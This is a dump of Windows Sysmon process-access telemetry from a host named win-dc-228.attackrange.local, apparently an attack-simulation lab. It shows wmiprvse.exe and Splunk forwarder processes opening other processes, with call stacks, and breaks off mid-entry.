14:10:02.212{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204008Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.212{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204007Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.212{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-EA3A-6040-614E-00000000AD01}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204006Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.212{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA3A-6040-614E-00000000AD01}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204005Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:02.213{5ABCFE62-EA3A-6040-614E-00000000AD01}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002204258Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B82D-00000000AD01}5444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204257Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B72D-00000000AD01}5372c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204256Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B62D-00000000AD01}6644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204255Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B52D-00000000AD01}4336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204254Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B42D-00000000AD01}2724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204253Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-ADE1-603E-4F0A-00000000AD01}7004C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204252Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9B0C-603E-D607-00000000AD01}6796C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204251Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204250Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204249Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204248Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.993{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8607-00000000AD01}4560C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204247Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8307-00000000AD01}1624C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204246Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F2-603E-7D07-00000000AD01}636C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204245Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F1-603E-7A07-00000000AD01}2736C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204244Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84BD-603E-DF00-00000000AD01}4964C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204243Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AF-603E-DC00-00000000AD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204242Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.978{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program 